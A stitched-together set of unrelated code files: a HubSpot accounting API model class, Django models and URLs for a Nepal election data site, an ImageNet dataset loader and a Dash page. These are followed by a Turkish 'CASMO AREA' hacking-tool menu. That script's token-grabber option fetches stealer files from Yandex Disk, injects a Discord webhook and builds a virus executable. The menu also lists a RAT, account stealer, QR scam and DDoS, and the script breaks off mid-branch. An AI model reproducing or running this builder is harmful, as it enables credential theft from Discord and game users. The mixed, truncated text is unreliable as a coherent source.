:rtype: str
"""
return self._get_invoice_pdf_url
@get_invoice_pdf_url.setter
def get_invoice_pdf_url(self, get_invoice_pdf_url):
"""Sets the get_invoice_pdf_url of this AccountingAppUrls.
A URL that specifies the endpoint where an invoice PDF can be retrieved. # noqa: E501
:param get_invoice_pdf_url: The get_invoice_pdf_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and get_invoice_pdf_url is None: # noqa: E501
raise ValueError("Invalid value for `get_invoice_pdf_url`, must not be `None`") # noqa: E501
self._get_invoice_pdf_url = get_invoice_pdf_url
@property
def customer_url_template(self):
"""Gets the customer_url_template of this AccountingAppUrls. # noqa: E501
A template URL that indicates the endpoint where a customer can be fetched by ID. Note that ${CUSTOMER_ID} in this URL will be replaced by the actual customer ID. For example: https://myapp.com/api/customers/${CUSTOMER_ID} # noqa: E501
:return: The customer_url_template of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._customer_url_template
@customer_url_template.setter
def customer_url_template(self, customer_url_template):
"""Sets the customer_url_template of this AccountingAppUrls.
A template URL that indicates the endpoint where a customer can be fetched by ID. Note that ${CUSTOMER_ID} in this URL will be replaced by the actual customer ID. For example: https://myapp.com/api/customers/${CUSTOMER_ID} # noqa: E501
:param customer_url_template: The customer_url_template of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and customer_url_template is None: # noqa: E501
raise ValueError("Invalid value for `customer_url_template`, must not be `None`") # noqa: E501
self._customer_url_template = customer_url_template
@property
def product_url_template(self):
"""Gets the product_url_template of this AccountingAppUrls. # noqa: E501
A template URL that indicates the endpoint where a product can be fetched by ID. Note that ${PRODUCT_ID} in this URL will be replaced by the actual product ID. For example: https://myapp.com/api/products/${PRODUCT_ID} # noqa: E501
:return: The product_url_template of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._product_url_template
@product_url_template.setter
def product_url_template(self, product_url_template):
"""Sets the product_url_template of this AccountingAppUrls.
A template URL that indicates the endpoint where a product can be fetched by ID. Note that ${PRODUCT_ID} in this URL will be replaced by the actual product ID. For example: https://myapp.com/api/products/${PRODUCT_ID} # noqa: E501
:param product_url_template: The product_url_template of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and product_url_template is None: # noqa: E501
raise ValueError("Invalid value for `product_url_template`, must not be `None`") # noqa: E501
self._product_url_template = product_url_template
@property
def invoice_url_template(self):
"""Gets the invoice_url_template of this AccountingAppUrls. # noqa: E501
A template URL that indicates the endpoint where an invoice can be fetched by ID. Note that ${INVOICE_ID} in this URL will be replaced by the actual invoice ID. For example: https://myapp.com/api/invoices/${INVOICE_ID} # noqa: E501
:return: The invoice_url_template of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._invoice_url_template
@invoice_url_template.setter
def invoice_url_template(self, invoice_url_template):
"""Sets the invoice_url_template of this AccountingAppUrls.
A template URL that indicates the endpoint where an invoice can be fetched by ID. Note that ${INVOICE_ID} in this URL will be replaced by the actual invoice ID. For example: https://myapp.com/api/invoices/${INVOICE_ID} # noqa: E501
:param invoice_url_template: The invoice_url_template of this AccountingAppUrls. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and invoice_url_template is None: # noqa: E501
raise ValueError("Invalid value for `invoice_url_template`, must not be `None`") # noqa: E501
self._invoice_url_template = invoice_url_template
@property
def create_invoice_url(self):
"""Gets the create_invoice_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where an invoices can be created. # noqa: E501
:return: The create_invoice_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._create_invoice_url
@create_invoice_url.setter
def create_invoice_url(self, create_invoice_url):
"""Sets the create_invoice_url of this AccountingAppUrls.
A URL that specifies the endpoint where an invoices can be created. # noqa: E501
:param create_invoice_url: The create_invoice_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._create_invoice_url = create_invoice_url
@property
def search_invoice_url(self):
"""Gets the search_invoice_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where an invoice search can be performed. # noqa: E501
:return: The search_invoice_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_invoice_url
@search_invoice_url.setter
def search_invoice_url(self, search_invoice_url):
"""Sets the search_invoice_url of this AccountingAppUrls.
A URL that specifies the endpoint where an invoice search can be performed. # noqa: E501
:param search_invoice_url: The search_invoice_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_invoice_url = search_invoice_url
@property
def search_product_url(self):
"""Gets the search_product_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a product search can be performed. # noqa: E501
:return: The search_product_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_product_url
@search_product_url.setter
def search_product_url(self, search_product_url):
"""Sets the search_product_url of this AccountingAppUrls.
A URL that specifies the endpoint where a product search can be performed. # noqa: E501
:param search_product_url: The search_product_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_product_url = search_product_url
@property
def get_terms_url(self):
"""Gets the get_terms_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where payment terms can be retrieved. # noqa: E501
:return: The get_terms_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._get_terms_url
@get_terms_url.setter
def get_terms_url(self, get_terms_url):
"""Sets the get_terms_url of this AccountingAppUrls.
A URL that specifies the endpoint where payment terms can be retrieved. # noqa: E501
:param get_terms_url: The get_terms_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._get_terms_url = get_terms_url
@property
def create_customer_url(self):
"""Gets the create_customer_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a new customer can be created. # noqa: E501
:return: The create_customer_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._create_customer_url
@create_customer_url.setter
def create_customer_url(self, create_customer_url):
"""Sets the create_customer_url of this AccountingAppUrls.
A URL that specifies the endpoint where a new customer can be created. # noqa: E501
:param create_customer_url: The create_customer_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._create_customer_url = create_customer_url
@property
def search_tax_url(self):
"""Gets the search_tax_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where a tax search can be performed. # noqa: E501
:return: The search_tax_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_tax_url
@search_tax_url.setter
def search_tax_url(self, search_tax_url):
"""Sets the search_tax_url of this AccountingAppUrls.
A URL that specifies the endpoint where a tax search can be performed. # noqa: E501
:param search_tax_url: The search_tax_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_tax_url = search_tax_url
@property
def exchange_rate_url(self):
"""Gets the exchange_rate_url of this AccountingAppUrls. # noqa: E501
A URL that specifies the endpoint where exchange rates can be queried. # noqa: E501
:return: The exchange_rate_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._exchange_rate_url
@exchange_rate_url.setter
def exchange_rate_url(self, exchange_rate_url):
"""Sets the exchange_rate_url of this AccountingAppUrls.
A URL that specifies the endpoint where exchange rates can be queried. # noqa: E501
:param exchange_rate_url: The exchange_rate_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._exchange_rate_url = exchange_rate_url
@property
def search_url(self):
"""Gets the search_url of this AccountingAppUrls. # noqa: E501
:return: The search_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_url
@search_url.setter
def search_url(self, search_url):
"""Sets the search_url of this AccountingAppUrls.
:param search_url: The search_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_url = search_url
@property
def search_count_url(self):
"""Gets the search_count_url of this AccountingAppUrls. # noqa: E501
:return: The search_count_url of this AccountingAppUrls. # noqa: E501
:rtype: str
"""
return self._search_count_url
@search_count_url.setter
def search_count_url(self, search_count_url):
"""Sets the search_count_url of this AccountingAppUrls.
:param search_count_url: The search_count_url of this AccountingAppUrls. # noqa: E501
:type: str
"""
self._search_count_url = search_count_url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AccountingAppUrls):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, AccountingAppUrls):
return True
return self.to_dict() != other.to_dict()
|
[
"six.iteritems",
"hubspot.crm.extensions.accounting.configuration.Configuration"
] |
[((18751, 18784), 'six.iteritems', 'six.iteritems', (['self.openapi_types'], {}), '(self.openapi_types)\n', (18764, 18784), False, 'import six\n'), ((2930, 2945), 'hubspot.crm.extensions.accounting.configuration.Configuration', 'Configuration', ([], {}), '()\n', (2943, 2945), False, 'from hubspot.crm.extensions.accounting.configuration import Configuration\n')]
|
from __future__ import unicode_literals
from mezzanine.core import fields
from mezzanine.pages.models import Page
from django.db import models
DATASET_TYPES = [
('Voters', 'Voters'),
('Candidates', 'Candidates'),
('Political Parties', 'Political Parties'),
('Federal', 'Federal'),
('Results', 'Results'),
('Others', 'Others'),
]
DISTRICT = [
('Achham ', 'Achham'),
('Arghakhanchi', 'Arghakhanchi'),
('Baglung', 'Baglung'),
('Baitadi', 'Baitadi'),
('Bajhang', 'Bajhang'),
('Bajura', 'Bajura'),
('Banke', 'Banke'),
('Bara', 'Bara'),
('Bardiya', 'Bardiya'),
('Bhaktapur', 'Bhaktapur'),
('Bhojpur', 'Bhojpur'),
('Chitwan', 'Chitwan'),
('Dadeldhura', 'Dadeldhura'),
('Dailekh', 'Dailekh'),
('Dang', 'Dang'),
('Darchula', 'Darchula'),
('Dhading', 'Dhading'),
('Dhankuta', 'Dhankuta'),
('Dhanusa', 'Dhanusa'),
('Dolakha', 'Dolakha'),
('Dolpa', 'Dolpa'),
('Doti', 'Doti'),
('Gorkha', 'Gorkha'),
('Gulmi', 'Gulmi'),
('Humla', 'Humla'),
('Ilam', 'Ilam'),
('Jajarkot', 'Jajarkot'),
('Jhapa', 'Jhapa'),
('Jumla', 'Jumla'),
('Kailali', 'Kailali'),
('Kalikot', 'Kalikot'),
('Kanchanpur', 'Kanchanpur'),
('Kapilbastu', 'Kapilbastu'),
('Kaski', 'Kaski'),
('Kathmandu', 'Kathmandu'),
('Kavrepalanchok', 'Kavrepalanchok'),
('Khotang', 'Khotang'),
('Lalitpur', 'Lalitpur'),
('Lamjung', 'Lamjung'),
('Mahottari', 'Mahottari'),
('Makwanpur', 'Makwanpur'),
('Manang', 'Manang'),
('Morang', 'Morang'),
('Mugu', 'Mugu'),
('Mustang', 'Mustang'),
('Myagdi', 'Myagdi'),
('Nawalparasi', 'Nawalparasi'),
('Nuwakot', 'Nuwakot'),
('Okhaldhunga', 'Okhaldhunga'),
('Palpa', 'Palpa'),
('Panchthar', 'Panchthar'),
('Parbat', 'Parbat'),
('Parsa', 'Parsa'),
('Pyuthan', 'Pyuthan'),
('Ramechhap', 'Ramechhap'),
('Rasuwa', 'Rasuwa'),
('Rautahat', 'Rautahat'),
('Rolpa', 'Rolpa'),
('Rukum', 'Rukum'),
('Rupandehi', 'Rupandehi'),
('Salyan', 'Salyan'),
('Sankhuwasabha', 'Sankhuwasabha'),
('Saptari', 'Saptari'),
('Sarlahi', 'Sarlahi'),
('Sindhuli', 'Sindhuli'),
('Sindhupalchok', 'Sindhupalchok'),
('Siraha', 'Siraha'),
('Solukhumbu', 'Solukhumbu'),
('Sunsari', 'Sunsari'),
('Surkhet', 'Surkhet'),
('Syangja', 'Syangja'),
('Tanahu', 'Tanahu'),
('Taplejung', 'Taplejung'),
('Terhathum', 'Terhathum'),
('Udayapur', 'Udayapur'),
]
PROVINCE_NO = [ (1, 1),(2, 2),(3, 3),(4, 4),(5, 5),(6, 6),(7, 7)]
# Create your models here.
class SiteInformation(models.Model):
Logo=fields.FileField("Logo", format="Image")
Site_Title = models.CharField(max_length=100, null=False, blank=False)
Site_Meta_Key = models.CharField(max_length=160, null=False, blank=False)
Site_Meta_Description = models.TextField(max_length=160, null=False, blank=False)
Footer_Logo=fields.FileField("Footer Logo", format="Image")
def __str__(self):
return "Edit Here"
def __unicode__(self):
return "Edit Here"
class Meta:
verbose_name_plural = 'Site Information'
class AboutUs(models.Model):
Content=fields.RichTextField(null=True, blank=True)
def __str__(self):
return "About Us"
def __unicode__(self):
return "About Us"
class Meta:
verbose_name_plural = 'About Us'
class Data_template(Page):
pass
def __str__(self):
return "Projects"
class Meta:
verbose_name = 'Data'
verbose_name_plural = 'Dataset'
class Data(models.Model):
Data_Title = models.CharField(max_length=100, null=False, blank=False)
GitHub_Link = models.URLField()
added = models.DateTimeField(auto_now_add=True)
type=models.CharField(max_length=100, null=True, blank=True, choices=DATASET_TYPES)
district=models.CharField(max_length=100, null=True, blank=True,choices=DISTRICT)
province=models.IntegerField(null=True, blank=True,choices=PROVINCE_NO)
def __str__(self):
return self.Data_Title
def __unicode__(self):
return self.Data_Title
class Visualization_template(Page):
pass
def __str__(self):
return "Visualization"
class Meta:
verbose_name = 'Visualizations'
verbose_name_plural = 'Visualization'
class Visualization(models.Model):
Data_Title = models.CharField(max_length=100, null=False, blank=False)
Inforgraphic =fields.FileField("Viusalization Image", format="Image")
GitHub_Link = models.URLField(null=True, blank=True)
added = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True,)
def __str__(self):
return self.Data_Title
def __unicode__(self):
return self.Data_Title
|
[
"django.db.models.TextField",
"django.db.models.URLField",
"django.db.models.CharField",
"django.db.models.IntegerField",
"mezzanine.core.fields.FileField",
"django.db.models.DateTimeField",
"mezzanine.core.fields.RichTextField"
] |
[((2657, 2697), 'mezzanine.core.fields.FileField', 'fields.FileField', (['"""Logo"""'], {'format': '"""Image"""'}), "('Logo', format='Image')\n", (2673, 2697), False, 'from mezzanine.core import fields\n'), ((2716, 2773), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(False)', 'blank': '(False)'}), '(max_length=100, null=False, blank=False)\n', (2732, 2773), False, 'from django.db import models\n'), ((2794, 2851), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(160)', 'null': '(False)', 'blank': '(False)'}), '(max_length=160, null=False, blank=False)\n', (2810, 2851), False, 'from django.db import models\n'), ((2880, 2937), 'django.db.models.TextField', 'models.TextField', ([], {'max_length': '(160)', 'null': '(False)', 'blank': '(False)'}), '(max_length=160, null=False, blank=False)\n', (2896, 2937), False, 'from django.db import models\n'), ((2954, 3001), 'mezzanine.core.fields.FileField', 'fields.FileField', (['"""Footer Logo"""'], {'format': '"""Image"""'}), "('Footer Logo', format='Image')\n", (2970, 3001), False, 'from mezzanine.core import fields\n'), ((3217, 3260), 'mezzanine.core.fields.RichTextField', 'fields.RichTextField', ([], {'null': '(True)', 'blank': '(True)'}), '(null=True, blank=True)\n', (3237, 3260), False, 'from mezzanine.core import fields\n'), ((3643, 3700), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(False)', 'blank': '(False)'}), '(max_length=100, null=False, blank=False)\n', (3659, 3700), False, 'from django.db import models\n'), ((3719, 3736), 'django.db.models.URLField', 'models.URLField', ([], {}), '()\n', (3734, 3736), False, 'from django.db import models\n'), ((3749, 3788), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (3769, 3788), False, 'from django.db import models\n'), ((3798, 3876), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'choices': 'DATASET_TYPES'}), '(max_length=100, null=True, blank=True, choices=DATASET_TYPES)\n', (3814, 3876), False, 'from django.db import models\n'), ((3890, 3963), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(True)', 'blank': '(True)', 'choices': 'DISTRICT'}), '(max_length=100, null=True, blank=True, choices=DISTRICT)\n', (3906, 3963), False, 'from django.db import models\n'), ((3976, 4039), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)', 'blank': '(True)', 'choices': 'PROVINCE_NO'}), '(null=True, blank=True, choices=PROVINCE_NO)\n', (3995, 4039), False, 'from django.db import models\n'), ((4415, 4472), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'null': '(False)', 'blank': '(False)'}), '(max_length=100, null=False, blank=False)\n', (4431, 4472), False, 'from django.db import models\n'), ((4491, 4546), 'mezzanine.core.fields.FileField', 'fields.FileField', (['"""Viusalization Image"""'], {'format': '"""Image"""'}), "('Viusalization Image', format='Image')\n", (4507, 4546), False, 'from mezzanine.core import fields\n'), ((4566, 4604), 'django.db.models.URLField', 'models.URLField', ([], {'null': '(True)', 'blank': '(True)'}), '(null=True, blank=True)\n', (4581, 4604), False, 'from django.db import models\n'), ((4617, 4656), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (4637, 4656), False, 'from django.db import models\n'), ((4671, 4706), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (4691, 4706), False, 'from django.db import models\n')]
|
from django.conf.urls import include, url
from django.contrib import admin
from django.shortcuts import render
from authlib import views
from authlib.facebook import FacebookOAuth2Client
from authlib.google import GoogleOAuth2Client
from authlib.twitter import TwitterOAuthClient
from testapp.views import custom_verification, custom_verification_code
urlpatterns = [
url(r"", include("authlib.admin_oauth.urls")),
url(r"^admin/", admin.site.urls),
url(r"^404/$", lambda request: render(request, "404.html")),
url(r"^login/$", views.login, name="login"),
url(
r"^oauth/facebook/$",
views.oauth2,
{"client_class": FacebookOAuth2Client},
name="accounts_oauth_facebook",
),
url(
r"^oauth/google/$",
views.oauth2,
{"client_class": GoogleOAuth2Client},
name="accounts_oauth_google",
),
url(
r"^oauth/twitter/$",
views.oauth2,
{"client_class": TwitterOAuthClient},
name="accounts_oauth_twitter",
),
url(r"^email/$", views.email_registration, name="email_registration"),
url(
r"^email/(?P<code>[^/]+)/$",
views.email_registration,
name="email_registration_confirm",
),
url(r"^logout/$", views.logout, name="logout"),
url(r"^custom/$", custom_verification),
url(
r"^custom/(?P<code>[^/]+)/$",
custom_verification_code,
name="custom_verification_code",
),
]
|
[
"django.shortcuts.render",
"django.conf.urls.include",
"django.conf.urls.url"
] |
[((427, 458), 'django.conf.urls.url', 'url', (['"""^admin/"""', 'admin.site.urls'], {}), "('^admin/', admin.site.urls)\n", (430, 458), False, 'from django.conf.urls import include, url\n'), ((530, 572), 'django.conf.urls.url', 'url', (['"""^login/$"""', 'views.login'], {'name': '"""login"""'}), "('^login/$', views.login, name='login')\n", (533, 572), False, 'from django.conf.urls import include, url\n'), ((579, 693), 'django.conf.urls.url', 'url', (['"""^oauth/facebook/$"""', 'views.oauth2', "{'client_class': FacebookOAuth2Client}"], {'name': '"""accounts_oauth_facebook"""'}), "('^oauth/facebook/$', views.oauth2, {'client_class':\n FacebookOAuth2Client}, name='accounts_oauth_facebook')\n", (582, 693), False, 'from django.conf.urls import include, url\n'), ((735, 843), 'django.conf.urls.url', 'url', (['"""^oauth/google/$"""', 'views.oauth2', "{'client_class': GoogleOAuth2Client}"], {'name': '"""accounts_oauth_google"""'}), "('^oauth/google/$', views.oauth2, {'client_class': GoogleOAuth2Client},\n name='accounts_oauth_google')\n", (738, 843), False, 'from django.conf.urls import include, url\n'), ((885, 995), 'django.conf.urls.url', 'url', (['"""^oauth/twitter/$"""', 'views.oauth2', "{'client_class': TwitterOAuthClient}"], {'name': '"""accounts_oauth_twitter"""'}), "('^oauth/twitter/$', views.oauth2, {'client_class': TwitterOAuthClient},\n name='accounts_oauth_twitter')\n", (888, 995), False, 'from django.conf.urls import include, url\n'), ((1037, 1105), 'django.conf.urls.url', 'url', (['"""^email/$"""', 'views.email_registration'], {'name': '"""email_registration"""'}), "('^email/$', views.email_registration, name='email_registration')\n", (1040, 1105), False, 'from django.conf.urls import include, url\n'), ((1112, 1209), 'django.conf.urls.url', 'url', (['"""^email/(?P<code>[^/]+)/$"""', 'views.email_registration'], {'name': '"""email_registration_confirm"""'}), "('^email/(?P<code>[^/]+)/$', views.email_registration, name=\n 'email_registration_confirm')\n", (1115, 1209), False, 'from django.conf.urls import include, url\n'), ((1242, 1287), 'django.conf.urls.url', 'url', (['"""^logout/$"""', 'views.logout'], {'name': '"""logout"""'}), "('^logout/$', views.logout, name='logout')\n", (1245, 1287), False, 'from django.conf.urls import include, url\n'), ((1294, 1331), 'django.conf.urls.url', 'url', (['"""^custom/$"""', 'custom_verification'], {}), "('^custom/$', custom_verification)\n", (1297, 1331), False, 'from django.conf.urls import include, url\n'), ((1338, 1434), 'django.conf.urls.url', 'url', (['"""^custom/(?P<code>[^/]+)/$"""', 'custom_verification_code'], {'name': '"""custom_verification_code"""'}), "('^custom/(?P<code>[^/]+)/$', custom_verification_code, name=\n 'custom_verification_code')\n", (1341, 1434), False, 'from django.conf.urls import include, url\n'), ((385, 420), 'django.conf.urls.include', 'include', (['"""authlib.admin_oauth.urls"""'], {}), "('authlib.admin_oauth.urls')\n", (392, 420), False, 'from django.conf.urls import include, url\n'), ((496, 523), 'django.shortcuts.render', 'render', (['request', '"""404.html"""'], {}), "(request, '404.html')\n", (502, 523), False, 'from django.shortcuts import render\n')]
|
from torchvision.datasets.vision import VisionDataset
import os
import pickle
from torchvision.datasets.folder import default_loader
class Imagenet(VisionDataset):
def __init__(self, root, data_list, train=True, transform=None, target_transform=None, img_dir='all', target_dir='annos'):
super(Imagenet, self).__init__(root, transform=transform,
target_transform=target_transform)
self.data = []
self.targets = []
self.train = train
self.data_list = os.path.join(root, data_list)
self.img_dir_path = os.path.join(root, img_dir)
self.target_dir_path = os.path.join(root, target_dir)
self.transform = transform
self.target_transform = target_transform
if (os.path.isfile(self.data_list)):
with open(self.data_list, 'r') as infile:
for line in infile:
img_name, label = line.strip().split(' ')
self.data.append(os.path.join(self.img_dir_path, img_name))
self.targets.append(int(label) - 1)
else:
print('data list is not file')
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img_path, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = default_loader(img_path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
def extra_repr(self):
return "Split: {}".format("Train" if self.train is True else "Test")
|
[
"torchvision.datasets.folder.default_loader",
"os.path.isfile",
"os.path.join"
] |
[((535, 564), 'os.path.join', 'os.path.join', (['root', 'data_list'], {}), '(root, data_list)\n', (547, 564), False, 'import os\n'), ((593, 620), 'os.path.join', 'os.path.join', (['root', 'img_dir'], {}), '(root, img_dir)\n', (605, 620), False, 'import os\n'), ((652, 682), 'os.path.join', 'os.path.join', (['root', 'target_dir'], {}), '(root, target_dir)\n', (664, 682), False, 'import os\n'), ((779, 809), 'os.path.isfile', 'os.path.isfile', (['self.data_list'], {}), '(self.data_list)\n', (793, 809), False, 'import os\n'), ((1539, 1563), 'torchvision.datasets.folder.default_loader', 'default_loader', (['img_path'], {}), '(img_path)\n', (1553, 1563), False, 'from torchvision.datasets.folder import default_loader\n'), ((1001, 1042), 'os.path.join', 'os.path.join', (['self.img_dir_path', 'img_name'], {}), '(self.img_dir_path, img_name)\n', (1013, 1042), False, 'import os\n')]
|
from dash import html, dcc
import dash_bootstrap_components as dbc
import pandas as pd
from .demo import blueprint as spa
global_md = """\
### Global Warming
Global Temperature Time Series. Data are included from the GISS
Surface Temperature (GISTEMP) analysis and the global component
of Climate at a Glance (GCAG). Two datasets are provided:
* Global monthly mean
* Annual mean temperature anomalies in degrees Celsius from 1880 to the present
"""
# Taken from Dash example, see:
# https://dash.plot.ly/datatable
df = pd.read_csv('demo/data/solar.csv')
@spa.route('/solar', title='Solar')
def solar():
return html.Div([
html.Div([
html.Div([], className="col-md-2"),
html.Div([
html.H2('US Solar Capacity'),
html.Br(),
dbc.Table.from_dataframe(df, striped=True, bordered=True, hover=True),
html.Div(id='output')
], className="col-md-8"),
html.Div([], className="col-md-2")
], className='row'),
dbc.Row([
dbc.Col([
dcc.Link("Global Warming", href=spa.url_for('warming'), className="btn btn-primary float-end")
], md=12)
])
], className="container-fluid")
|
[
"dash.html.H2",
"pandas.read_csv",
"dash.html.Div",
"dash_bootstrap_components.Table.from_dataframe",
"dash.html.Br"
] |
[((527, 561), 'pandas.read_csv', 'pd.read_csv', (['"""demo/data/solar.csv"""'], {}), "('demo/data/solar.csv')\n", (538, 561), True, 'import pandas as pd\n'), ((665, 699), 'dash.html.Div', 'html.Div', (['[]'], {'className': '"""col-md-2"""'}), "([], className='col-md-2')\n", (673, 699), False, 'from dash import html, dcc\n'), ((972, 1006), 'dash.html.Div', 'html.Div', (['[]'], {'className': '"""col-md-2"""'}), "([], className='col-md-2')\n", (980, 1006), False, 'from dash import html, dcc\n'), ((740, 768), 'dash.html.H2', 'html.H2', (['"""US Solar Capacity"""'], {}), "('US Solar Capacity')\n", (747, 768), False, 'from dash import html, dcc\n'), ((786, 795), 'dash.html.Br', 'html.Br', ([], {}), '()\n', (793, 795), False, 'from dash import html, dcc\n'), ((813, 882), 'dash_bootstrap_components.Table.from_dataframe', 'dbc.Table.from_dataframe', (['df'], {'striped': '(True)', 'bordered': '(True)', 'hover': '(True)'}), '(df, striped=True, bordered=True, hover=True)\n', (837, 882), True, 'import dash_bootstrap_components as dbc\n'), ((900, 921), 'dash.html.Div', 'html.Div', ([], {'id': '"""output"""'}), "(id='output')\n", (908, 921), False, 'from dash import html, dcc\n')]
|
import os
from licensing.models import *
from licensing.methods import Key, Helpers
from PIL import Image, ImageFont, ImageDraw
import sys
import time
from colorama import Fore, Back, Style, init
import shutil
import sys
import os
import requests
import shutil
from bs4 import BeautifulSoup
from requests import get
init(autoreset=True)
import requests
a = 5
b = 6
if a == b:
print("burası eskiden lisans key sistemi oldugu için kodları bozulmaması için kaldı")
#hehe deneme
else:
ShowText = 'CASPERSS AREA'
API_ENDPOINT = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
APPDATA = os.getenv("APPDATA")
def _get_real_direct_link(sharing_link):
pk_request = requests.get(API_ENDPOINT.format(sharing_link))
# Returns None if the link cannot be "converted"
return pk_request.json().get('href')
def _extract_filename(direct_link):
for chunk in direct_link.strip().split('&'):
if chunk.startswith('filename='):
return chunk.split('=')[1]
return None
def download_yandex_link(sharing_link, filename=None):
direct_link = _get_real_direct_link(sharing_link)
if direct_link:
filename = filename or _extract_filename(direct_link)
download = requests.get(direct_link)
os.chdir(APPDATA)
with open(filename, 'wb') as out_file:
out_file.write(download.content)
print('İndirildi exploit "{}" "{}"')
else:
print('Bağlantını Kontrol et "{}"')
def Spinner():
l = ['|', '/', '-', '\\']
for i in l + l + l:
sys.stdout.write(f"""\r# Yükleniyor... {i}""")
sys.stdout.flush()
time.sleep(0.4)
font = ImageFont.truetype('arialbd.ttf', 15)
size = font.getsize(ShowText)
image = Image.new('1', size, 1)
draw = ImageDraw.Draw(image)
draw.text((0, 0), ShowText, font=font)
for rownum in range(size[1]):
line = []
for colnum in range(size[0]):
if image.getpixel((colnum, rownum)):
line.append(' '),
else:
line.append('#'),
print(Fore.LIGHTGREEN_EX + ''.join(line))
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(
Fore.RED + "https://discord.gg/X8KjZJ3J2U ----- https://github.com/Casper-dev172 ------- doldoldol#3909(CASMO#9663)")
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(Fore.CYAN + "Welcome CASMO AREA")
print(Fore.MAGENTA + "[1] Rat")
print(Fore.MAGENTA + "[2] Discord Token Grabber")
print(Fore.MAGENTA + "[3] Fake QR Scam")
print(Fore.MAGENTA + "[4] Sbo Fucker v2")
print(Fore.MAGENTA + "[5] Craftrise Account Stealer")
print(Fore.MAGENTA + "[6] Fastfingers word hack")
print(Fore.MAGENTA + "[7] İd to token")
print(Fore.MAGENTA + "[8] Website Cloner")
print(Fore.MAGENTA + "[9] DDOS ATTACK!")
print(Fore.MAGENTA + "[10] DİSCORD TOKEN WORLD!")
print(Fore.MAGENTA+"[11] Discord Webhook spammer")
anan = os.getcwd()
x = input()
if x == "1":
Spinner()
print("Bu Geliştirme Sürecindedir yakında gelecektir.")
if x == "2":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/RyoA8MTLfGNlVw")
download_yandex_link("https://disk.yandex.com.tr/d/6lTr5TINtpbD2Q")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("sasa.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup.py build")
time.sleep(15)
os.remove("sasa.py")
os.remove("setup.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "5":
Spinner()
print("Webhook Giriniz")
y = input()
